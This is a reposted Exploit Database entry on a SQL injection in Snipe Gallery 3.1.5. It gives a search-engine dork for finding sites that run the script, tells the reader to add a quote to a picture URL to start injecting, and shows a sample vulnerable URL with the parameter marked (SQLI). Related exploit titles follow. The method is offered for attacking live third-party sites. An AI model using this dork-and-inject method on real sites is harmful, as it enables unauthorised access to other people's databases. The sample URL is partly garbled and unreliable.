snipe Gallery Script – SQL Injection

Exploit Database
100 阅读

作者： dev!l ghost

日期： 2010-06-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14053/

# Exploit Title: snipe gallery Script Sql Injection
# Date: 26/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.h00forall.com
# Script url: http://sourceforge.net/projects/snipegallery/
# Version: 3.1.5
# Tested on: Windows
# CVE : ()

:::::::::::::::::::::::::


=================Exploit=================
DorK:(Snipe Gallery v.3.1.5 by Snipe.Net)

When You search with the dork you will find a lot of sites ,,enter
site and you will find a lot of pictures enter any picture and 
the pot the(')and start the inject

the inject is very easy 



----exploit---- 

{{DeMo}}
http://www.example.com/snipe/image.php?page=1&search_type=and?_id=78(SQLI)

---------greatz----------
Greatz to all my frinds and the all muslims 
and Volc4n0 and Golden Ice and mr.ip
and the all

last Exploits
snipe Gallery Script – SQL Injection的更多信息

GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 – Arbitrary File Upload：
Simea CMS – ‘index.php’ SQL Injection：
i-doit Pro – ‘objID’ SQL Injection：
ilchClan 1.0.5 – ‘cid’ SQL Injection：
Advance B2B Script 2.1.3 – ‘show_id’ / ‘pid’ SQL Injection：
Softbiz Jobs – ‘sbad_type’ Cross-Site Scripting：
hupa webmail 0.0.2 – Persistent Cross-Site Scripting：
Linear eMerge E3 1.00-06 – Remote Code Execution：